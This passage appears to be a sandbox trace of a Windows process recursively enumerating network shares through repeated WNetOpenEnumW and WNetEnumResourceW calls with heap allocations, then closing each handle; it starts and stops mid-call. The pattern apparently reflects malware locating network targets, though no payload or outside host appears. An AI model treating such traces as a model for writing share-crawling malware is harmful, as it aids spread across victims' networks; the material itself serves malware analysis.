lpBufferSize=0x348de74 | out: lpcCount=0x348de84, lpBuffer=0x43901d8, lpBufferSize=0x348de74) returned 0x0 [0192.365] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x43a41e8 [0192.366] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43a81f0 [0192.366] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x43901d8, lphEnum=0x348de3c | out: lphEnum=0x348de3c*=0x28f9f8) returned 0x0 [0192.368] WNetEnumResourceW (in: hEnum=0x28f9f8, lpcCount=0x348de44, lpBuffer=0x43a41e8, lpBufferSize=0x348de34 | out: lpcCount=0x348de44, lpBuffer=0x43a41e8, lpBufferSize=0x348de34) returned 0x0 [0192.368] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x43b81f8 [0192.368] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43bc200 [0192.368] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x43a41e8, lphEnum=0x348ddfc | out: lphEnum=0x348ddfc*=0x28fa50) returned 0x0 [0192.370] WNetEnumResourceW (in: hEnum=0x28fa50, lpcCount=0x348de04, lpBuffer=0x43b81f8, lpBufferSize=0x348ddf4 | out: lpcCount=0x348de04, lpBuffer=0x43b81f8, lpBufferSize=0x348ddf4) returned 0x0 [0192.370] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x43cc208 [0192.370] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43d0210 [0192.371] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x43b81f8, lphEnum=0x348ddbc | out: lphEnum=0x348ddbc*=0x28faa8) returned 0x0 [0192.373] WNetEnumResourceW (in: hEnum=0x28faa8, lpcCount=0x348ddc4, lpBuffer=0x43cc208, lpBufferSize=0x348ddb4 | out: lpcCount=0x348ddc4, lpBuffer=0x43cc208, lpBufferSize=0x348ddb4) returned 0x0 [0192.373] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x43e0218 [0192.373] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43e4220 [0192.373] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x43cc208, lphEnum=0x348dd7c | out: lphEnum=0x348dd7c*=0x28fb00) returned 0x0 [0192.375] WNetEnumResourceW (in: hEnum=0x28fb00, lpcCount=0x348dd84, lpBuffer=0x43e0218, lpBufferSize=0x348dd74 | out: lpcCount=0x348dd84, lpBuffer=0x43e0218, lpBufferSize=0x348dd74) returned 0x0 [0192.375] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x43f4228 [0192.375] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x43f8230 [0192.376] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x43e0218, lphEnum=0x348dd3c | out: lphEnum=0x348dd3c*=0x2afea0) returned 0x0 [0192.377] WNetEnumResourceW (in: hEnum=0x2afea0, lpcCount=0x348dd44, lpBuffer=0x43f4228, lpBufferSize=0x348dd34 | out: lpcCount=0x348dd44, lpBuffer=0x43f4228, lpBufferSize=0x348dd34) returned 0x0 [0192.377] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4408238 [0192.378] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x440c240 [0192.378] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x43f4228, lphEnum=0x348dcfc | out: lphEnum=0x348dcfc*=0x2afef8) returned 0x0 [0192.380] WNetEnumResourceW (in: hEnum=0x2afef8, lpcCount=0x348dd04, lpBuffer=0x4408238, lpBufferSize=0x348dcf4 | out: lpcCount=0x348dd04, lpBuffer=0x4408238, lpBufferSize=0x348dcf4) returned 0x0 [0192.380] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x441c248 [0192.380] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4420250 [0192.380] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4408238, lphEnum=0x348dcbc | out: lphEnum=0x348dcbc*=0x2aff50) returned 0x0 [0192.382] WNetEnumResourceW (in: hEnum=0x2aff50, lpcCount=0x348dcc4, lpBuffer=0x441c248, lpBufferSize=0x348dcb4 | out: lpcCount=0x348dcc4, lpBuffer=0x441c248, lpBufferSize=0x348dcb4) returned 0x0 [0192.382] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4430258 [0192.382] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4434260 [0192.382] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x441c248, lphEnum=0x348dc7c | out: lphEnum=0x348dc7c*=0x2affa8) returned 0x0 [0192.384] WNetEnumResourceW (in: hEnum=0x2affa8, lpcCount=0x348dc84, lpBuffer=0x4430258, lpBufferSize=0x348dc74 | out: lpcCount=0x348dc84, lpBuffer=0x4430258, lpBufferSize=0x348dc74) returned 0x0 [0192.384] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4444268 [0192.385] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4448270 [0192.385] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4430258, lphEnum=0x348dc3c | out: lphEnum=0x348dc3c*=0x2b0000) returned 0x0 [0192.387] WNetEnumResourceW (in: hEnum=0x2b0000, lpcCount=0x348dc44, lpBuffer=0x4444268, lpBufferSize=0x348dc34 | out: lpcCount=0x348dc44, lpBuffer=0x4444268, lpBufferSize=0x348dc34) returned 0x0 [0192.387] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4458278 [0192.387] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x445c280 [0192.387] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4444268, lphEnum=0x348dbfc | out: lphEnum=0x348dbfc*=0x2b0058) returned 0x0 [0192.389] WNetEnumResourceW (in: hEnum=0x2b0058, lpcCount=0x348dc04, lpBuffer=0x4458278, lpBufferSize=0x348dbf4 | out: lpcCount=0x348dc04, lpBuffer=0x4458278, lpBufferSize=0x348dbf4) returned 0x0 [0192.390] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x446c288 [0192.390] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x4470290 [0192.390] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4458278, lphEnum=0x348dbbc | out: lphEnum=0x348dbbc*=0x2b00b0) returned 0x0 [0192.392] WNetEnumResourceW (in: hEnum=0x2b00b0, lpcCount=0x348dbc4, lpBuffer=0x446c288, lpBufferSize=0x348dbb4 | out: lpcCount=0x348dbc4, lpBuffer=0x446c288, lpBufferSize=0x348dbb4) returned 0x0 [0192.392] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x4480298 [0192.392] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x44842a0 [0192.393] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x446c288, lphEnum=0x348db7c | out: lphEnum=0x348db7c*=0x2b0108) returned 0x0 [0192.394] WNetEnumResourceW (in: hEnum=0x2b0108, lpcCount=0x348db84, lpBuffer=0x4480298, lpBufferSize=0x348db74 | out: lpcCount=0x348db84, lpBuffer=0x4480298, lpBufferSize=0x348db74) returned 0x0 [0192.394] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x44942a8 [0192.395] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x44982b0 [0192.395] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x4480298, lphEnum=0x348db3c | out: lphEnum=0x348db3c*=0x2b0160) returned 0x0 [0192.400] WNetEnumResourceW (in: hEnum=0x2b0160, lpcCount=0x348db44, lpBuffer=0x44942a8, lpBufferSize=0x348db34 | out: lpcCount=0x348db44, lpBuffer=0x44942a8, lpBufferSize=0x348db34) returned 0x0 [0192.400] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4000) returned 0x44a82b8 [0192.400] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x44ac2c0 [0192.400] WNetOpenEnumW (in: dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x44942a8, lphEnum=0x348dafc | out: lphEnum=0x348dafc*=0x2b01b8) returned 0x0 [0192.403] WNetEnumResourceW (in: hEnum=0x2b01b8, lpcCount=0x348db04, lpBuffer=0x44a82b8, lpBufferSize=0x348daf4 | out: lpcCount=0x348db04, lpBuffer=0x44a82b8, lpBufferSize=0x348daf4) returned 0x0 [0192.403] WNetEnumResourceW (in: hEnum=0x2b01b8, lpcCount=0x348db04, lpBuffer=0x44a82b8, lpBufferSize=0x348daf4 | out: lpcCount=0x348db04, lpBuffer=0x44a82b8, lpBufferSize=0x348daf4) returned 0x103 [0192.403] WNetCloseEnum (hEnum=0x2b01b8) returned 0x0 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x44a82b8 | out: hHeap=0x1db0000) returned 1 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x44ac2c0 | out: hHeap=0x1db0000) returned 1 [0192.403] WNetEnumResourceW (in: hEnum=0x2b0160, lpcCount=0x348db44, lpBuffer=0x44942a8, lpBufferSize=0x348db34 | out: lpcCount=0x348db44, lpBuffer=0x44942a8, lpBufferSize=0x348db34) returned 0x103 [0192.403] WNetCloseEnum (hEnum=0x2b0160) returned 0x0 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x44942a8 | out: hHeap=0x1db0000) returned 1 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x44982b0 | out: hHeap=0x1db0000) returned 1 [0192.403] WNetEnumResourceW (in: hEnum=0x2b0108, lpcCount=0x348db84, lpBuffer=0x4480298, lpBufferSize=0x348db74 | out: lpcCount=0x348db84, lpBuffer=0x4480298, lpBufferSize=0x348db74) returned 0x103 [0192.403] WNetCloseEnum (hEnum=0x2b0108) returned 0x0 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4480298 | out: hHeap=0x1db0000) returned 1 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x44842a0 | out: hHeap=0x1db0000) returned 1 [0192.403] WNetEnumResourceW (in: hEnum=0x2b00b0, lpcCount=0x348dbc4, lpBuffer=0x446c288, lpBufferSize=0x348dbb4 | out: lpcCount=0x348dbc4, lpBuffer=0x446c288, lpBufferSize=0x348dbb4) returned 0x103 [0192.403] WNetCloseEnum (hEnum=0x2b00b0) returned 0x0 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x446c288 | out: hHeap=0x1db0000) returned 1 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4470290 | out: hHeap=0x1db0000) returned 1 [0192.403] WNetEnumResourceW (in: hEnum=0x2b0058, lpcCount=0x348dc04, lpBuffer=0x4458278, lpBufferSize=0x348dbf4 | out: lpcCount=0x348dc04, lpBuffer=0x4458278, lpBufferSize=0x348dbf4) returned 0x103 [0192.403] WNetCloseEnum (hEnum=0x2b0058) returned 0x0 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4458278 | out: hHeap=0x1db0000) returned 1 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x445c280 | out: hHeap=0x1db0000) returned 1 [0192.403] WNetEnumResourceW (in: hEnum=0x2b0000, lpcCount=0x348dc44, lpBuffer=0x4444268, lpBufferSize=0x348dc34 | out: lpcCount=0x348dc44, lpBuffer=0x4444268, lpBufferSize=0x348dc34) returned 0x103 [0192.403] WNetCloseEnum (hEnum=0x2b0000) returned 0x0 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4444268 | out: hHeap=0x1db0000) returned 1 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4448270 | out: hHeap=0x1db0000) returned 1 [0192.403] WNetEnumResourceW (in: hEnum=0x2affa8, lpcCount=0x348dc84, lpBuffer=0x4430258, lpBufferSize=0x348dc74 | out: lpcCount=0x348dc84, lpBuffer=0x4430258, lpBufferSize=0x348dc74) returned 0x103 [0192.403] WNetCloseEnum (hEnum=0x2affa8) returned 0x0 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4430258 | out: hHeap=0x1db0000) returned 1 [0192.403] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4434260 | out: hHeap=0x1db0000) returned 1 [0192.414] WNetEnumResourceW (in: hEnum=0x2aff50, lpcCount=0x348dcc4, lpBuffer=0x441c248, lpBufferSize=0x348dcb4 | out: lpcCount=0x348dcc4, lpBuffer=0x441c248, lpBufferSize=0x348dcb4) returned 0x103 [0192.414] WNetCloseEnum (hEnum=0x2aff50) returned 0x0 [0192.414] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x441c248 | out: hHeap=0x1db0000) returned 1 [0192.414] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4420250 | out: hHeap=0x1db0000) returned 1 [0192.414] WNetEnumResourceW (in: hEnum=0x2afef8, lpcCount=0x348dd04, lpBuffer=0x4408238, lpBufferSize=0x348dcf4 | out: lpcCount=0x348dd04, lpBuffer=0x4408238, lpBufferSize=0x348dcf4) returned 0x103 [0192.414] WNetCloseEnum (hEnum=0x2afef8) returned 0x0 [0192.414] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4408238 | out: hHeap=0x1db0000) returned 1 [0192.414] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x440c240 | out: hHeap=0x1db0000) returned 1 [0192.414] WNetEnumResourceW (in: hEnum=0x2afea0, lpcCount=0x348dd44, lpBuffer=0x43f4228, lpBufferSize=0x348dd34 | out: lpcCount=0x348dd44, lpBuffer=0x43f4228, lpBufferSize=0x348dd34) returned 0x103 [0192.414] WNetCloseEnum (hEnum=0x2afea0) returned 0x0 [0192.414] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43f4228 | out: hHeap=0x1db0000) returned 1 [0192.414] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43f8230 | out: hHeap=0x1db0000) returned 1 [0192.414] WNetEnumResourceW (in: hEnum=0x28fb00, lpcCount=0x348dd84, lpBuffer=0x43e0218, lpBufferSize=0x348dd74 | out: lpcCount=0x348dd84, lpBuffer=0x43e0218, lpBufferSize=0x348dd74) returned 0x103 [0192.414] WNetCloseEnum (hEnum=0x28fb00) returned 0x0 [0192.414] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43e0218 | out: hHeap=0x1db0000) returned 1 [0192.415] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43e4220 | out: hHeap=0x1db0000) returned 1 [0192.415] WNetEnumResourceW (in: hEnum=0x28faa8, lpcCount=0x348ddc4, lpBuffer=0x43cc208, lpBufferSize=0x348ddb4 | out: lpcCount=0x348ddc4, lpBuffer=0x43cc208, lpBufferSize=0x348ddb4) returned 0x103 [0192.415] WNetCloseEnum (hEnum=0x28faa8) returned 0x0 [0192.415] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43cc208 | out: hHeap=0x1db0000) returned 1 [0192.415] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1db0000) returned 1 [0192.415] WNetEnumResourceW (in: hEnum=0x28fa50, lpcCount=0x348de04, lpBuffer=0x43b81f8, lpBufferSize=0x348ddf4 | out: lpcCount=0x348de04, lpBuffer=0x43b81f8, lpBufferSize=0x348ddf4) returned 0x103 [0192.415] WNetCloseEnum (hEnum=0x28fa50) returned 0x0 [0192.415] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43b81f8 | out: hHeap=0x1db0000) returned 1 [0192.415] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43bc200 | out: hHeap=0x1db0000) returned 1 [0192.415] WNetEnumResourceW (in: hEnum=0x28f9f8, lpcCount=0x348de44, lpBuffer=0x43a41e8, lpBufferSize=0x348de34 | out: lpcCount=0x348de44, lpBuffer=0x43a41e8, lpBufferSize=0x348de34) returned 0x103 [0192.415] WNetCloseEnum (hEnum=0x28f9f8) returned 0x0 [0192.415] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43a41e8 | out: hHeap=0x1db0000) returned 1 [0192.415] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43a81f0 | out: hHeap=0x1db0000) returned 1 [0192.416] WNetEnumResourceW (in: hEnum=0x28f9a0, lpcCount=0x348de84, lpBuffer=0x43901d8, lpBufferSize=0x348de74 | out: lpcCount=0x348de84, lpBuffer=0x43901d8, lpBufferSize=0x348de74) returned 0x103 [0192.416] WNetCloseEnum (hEnum=0x28f9a0) returned 0x0 [0192.416] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43901d8 | out: hHeap=0x1db0000) returned 1 [0192.416] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43941e0 | out: hHeap=0x1db0000) returned 1 [0192.416] WNetEnumResourceW (in: hEnum=0x28f948, lpcCount=0x348dec4, lpBuffer=0x437c1c8, lpBufferSize=0x348deb4 | out: lpcCount=0x348dec4, lpBuffer=0x437c1c8, lpBufferSize=0x348deb4) returned 0x103 [0192.416] WNetCloseEnum (hEnum=0x28f948) returned 0x0 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x437c1c8 | out: hHeap=0x1db0000) returned 1 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43801d0 | out: hHeap=0x1db0000) returned 1 [0192.417] WNetEnumResourceW (in: hEnum=0x28f8f0, lpcCount=0x348df04, lpBuffer=0x43681b8, lpBufferSize=0x348def4 | out: lpcCount=0x348df04, lpBuffer=0x43681b8, lpBufferSize=0x348def4) returned 0x103 [0192.417] WNetCloseEnum (hEnum=0x28f8f0) returned 0x0 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43681b8 | out: hHeap=0x1db0000) returned 1 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x436c1c0 | out: hHeap=0x1db0000) returned 1 [0192.417] WNetEnumResourceW (in: hEnum=0x28f898, lpcCount=0x348df44, lpBuffer=0x43541a8, lpBufferSize=0x348df34 | out: lpcCount=0x348df44, lpBuffer=0x43541a8, lpBufferSize=0x348df34) returned 0x103 [0192.417] WNetCloseEnum (hEnum=0x28f898) returned 0x0 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43541a8 | out: hHeap=0x1db0000) returned 1 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43581b0 | out: hHeap=0x1db0000) returned 1 [0192.417] WNetEnumResourceW (in: hEnum=0x28f840, lpcCount=0x348df84, lpBuffer=0x4340198, lpBufferSize=0x348df74 | out: lpcCount=0x348df84, lpBuffer=0x4340198, lpBufferSize=0x348df74) returned 0x103 [0192.417] WNetCloseEnum (hEnum=0x28f840) returned 0x0 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4340198 | out: hHeap=0x1db0000) returned 1 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x43441a0 | out: hHeap=0x1db0000) returned 1 [0192.417] WNetEnumResourceW (in: hEnum=0x28f7e8, lpcCount=0x348dfc4, lpBuffer=0x432c188, lpBufferSize=0x348dfb4 | out: lpcCount=0x348dfc4, lpBuffer=0x432c188, lpBufferSize=0x348dfb4) returned 0x103 [0192.417] WNetCloseEnum (hEnum=0x28f7e8) returned 0x0 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x432c188 | out: hHeap=0x1db0000) returned 1 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4330190 | out: hHeap=0x1db0000) returned 1 [0192.417] WNetEnumResourceW (in: hEnum=0x28f790, lpcCount=0x348e004, lpBuffer=0x4318178, lpBufferSize=0x348dff4 | out: lpcCount=0x348e004, lpBuffer=0x4318178, lpBufferSize=0x348dff4) returned 0x103 [0192.417] WNetCloseEnum (hEnum=0x28f790) returned 0x0 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4318178 | out: hHeap=0x1db0000) returned 1 [0192.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x431c180 | out: hHeap=0x1db0000) returned 1 [0192.533] WNetEnumResourceW (in: hEnum=0x28f738, lpcCount=0x348e044, lpBuffer=0x4304168, lpBufferSize=0x348e034 | out: lpcCount=0x348e044, lpBuffer=0x4304168, lpBufferSize=0x348e034) returned 0x103 [0192.534] WNetCloseEnum (hEnum=0x28f738) returned 0x0 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4304168 | out: hHeap=0x1db0000) returned 1 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4308170 | out: hHeap=0x1db0000) returned 1 [0192.534] WNetEnumResourceW (in: hEnum=0x28f6e0, lpcCount=0x348e084, lpBuffer=0x42f0158, lpBufferSize=0x348e074 | out: lpcCount=0x348e084, lpBuffer=0x42f0158, lpBufferSize=0x348e074) returned 0x103 [0192.534] WNetCloseEnum (hEnum=0x28f6e0) returned 0x0 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42f0158 | out: hHeap=0x1db0000) returned 1 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42f4160 | out: hHeap=0x1db0000) returned 1 [0192.534] WNetEnumResourceW (in: hEnum=0x28f688, lpcCount=0x348e0c4, lpBuffer=0x42dc148, lpBufferSize=0x348e0b4 | out: lpcCount=0x348e0c4, lpBuffer=0x42dc148, lpBufferSize=0x348e0b4) returned 0x103 [0192.534] WNetCloseEnum (hEnum=0x28f688) returned 0x0 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42dc148 | out: hHeap=0x1db0000) returned 1 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42e0150 | out: hHeap=0x1db0000) returned 1 [0192.534] WNetEnumResourceW (in: hEnum=0x28f630, lpcCount=0x348e104, lpBuffer=0x42c8138, lpBufferSize=0x348e0f4 | out: lpcCount=0x348e104, lpBuffer=0x42c8138, lpBufferSize=0x348e0f4) returned 0x103 [0192.534] WNetCloseEnum (hEnum=0x28f630) returned 0x0 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42c8138 | out: hHeap=0x1db0000) returned 1 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42cc140 | out: hHeap=0x1db0000) returned 1 [0192.534] WNetEnumResourceW (in: hEnum=0x28f5d8, lpcCount=0x348e144, lpBuffer=0x42b4128, lpBufferSize=0x348e134 | out: lpcCount=0x348e144, lpBuffer=0x42b4128, lpBufferSize=0x348e134) returned 0x103 [0192.534] WNetCloseEnum (hEnum=0x28f5d8) returned 0x0 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42b4128 | out: hHeap=0x1db0000) returned 1 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42b8130 | out: hHeap=0x1db0000) returned 1 [0192.534] WNetEnumResourceW (in: hEnum=0x28f580, lpcCount=0x348e184, lpBuffer=0x42a0118, lpBufferSize=0x348e174 | out: lpcCount=0x348e184, lpBuffer=0x42a0118, lpBufferSize=0x348e174) returned 0x103 [0192.534] WNetCloseEnum (hEnum=0x28f580) returned 0x0 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42a0118 | out: hHeap=0x1db0000) returned 1 [0192.534] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42a4120 | out: hHeap=0x1db0000) returned 1 [0192.536] WNetEnumResourceW (in: hEnum=0x28f528, lpcCount=0x348e1c4, lpBuffer=0x428c108, lpBufferSize=0x348e1b4 | out: lpcCount=0x348e1c4, lpBuffer=0x428c108, lpBufferSize=0x348e1b4) returned 0x103 [0192.536] WNetCloseEnum (hEnum=0x28f528) returned 0x0 [0192.536] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x428c108 | out: hHeap=0x1db0000) returned 1 [0192.536] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4290110 | out: hHeap=0x1db0000) returned 1 [0192.538] WNetEnumResourceW (in: hEnum=0x28f4d0, lpcCount=0x348e204, lpBuffer=0x42780f8, lpBufferSize=0x348e1f4 | out: lpcCount=0x348e204, lpBuffer=0x42780f8, lpBufferSize=0x348e1f4) returned 0x103 [0192.538] WNetCloseEnum (hEnum=0x28f4d0) returned 0x0 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42780f8 | out: hHeap=0x1db0000) returned 1 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x427c100 | out: hHeap=0x1db0000) returned 1 [0192.539] WNetEnumResourceW (in: hEnum=0x28f478, lpcCount=0x348e244, lpBuffer=0x42640e8, lpBufferSize=0x348e234 | out: lpcCount=0x348e244, lpBuffer=0x42640e8, lpBufferSize=0x348e234) returned 0x103 [0192.539] WNetCloseEnum (hEnum=0x28f478) returned 0x0 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42640e8 | out: hHeap=0x1db0000) returned 1 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42680f0 | out: hHeap=0x1db0000) returned 1 [0192.539] WNetEnumResourceW (in: hEnum=0x28f420, lpcCount=0x348e284, lpBuffer=0x42500d8, lpBufferSize=0x348e274 | out: lpcCount=0x348e284, lpBuffer=0x42500d8, lpBufferSize=0x348e274) returned 0x103 [0192.539] WNetCloseEnum (hEnum=0x28f420) returned 0x0 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42500d8 | out: hHeap=0x1db0000) returned 1 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42540e0 | out: hHeap=0x1db0000) returned 1 [0192.539] WNetEnumResourceW (in: hEnum=0x28f3c8, lpcCount=0x348e2c4, lpBuffer=0x423c0c8, lpBufferSize=0x348e2b4 | out: lpcCount=0x348e2c4, lpBuffer=0x423c0c8, lpBufferSize=0x348e2b4) returned 0x103 [0192.539] WNetCloseEnum (hEnum=0x28f3c8) returned 0x0 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x423c0c8 | out: hHeap=0x1db0000) returned 1 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42400d0 | out: hHeap=0x1db0000) returned 1 [0192.539] WNetEnumResourceW (in: hEnum=0x28f370, lpcCount=0x348e304, lpBuffer=0x42280b8, lpBufferSize=0x348e2f4 | out: lpcCount=0x348e304, lpBuffer=0x42280b8, lpBufferSize=0x348e2f4) returned 0x103 [0192.539] WNetCloseEnum (hEnum=0x28f370) returned 0x0 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42280b8 | out: hHeap=0x1db0000) returned 1 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x422c0c0 | out: hHeap=0x1db0000) returned 1 [0192.539] WNetEnumResourceW (in: hEnum=0x28bf90, lpcCount=0x348e344, lpBuffer=0x42140a8, lpBufferSize=0x348e334 | out: lpcCount=0x348e344, lpBuffer=0x42140a8, lpBufferSize=0x348e334) returned 0x103 [0192.539] WNetCloseEnum (hEnum=0x28bf90) returned 0x0 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42140a8 | out: hHeap=0x1db0000) returned 1 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42180b0 | out: hHeap=0x1db0000) returned 1 [0192.539] WNetEnumResourceW (in: hEnum=0x28bf38, lpcCount=0x348e384, lpBuffer=0x4200098, lpBufferSize=0x348e374 | out: lpcCount=0x348e384, lpBuffer=0x4200098, lpBufferSize=0x348e374) returned 0x103 [0192.539] WNetCloseEnum 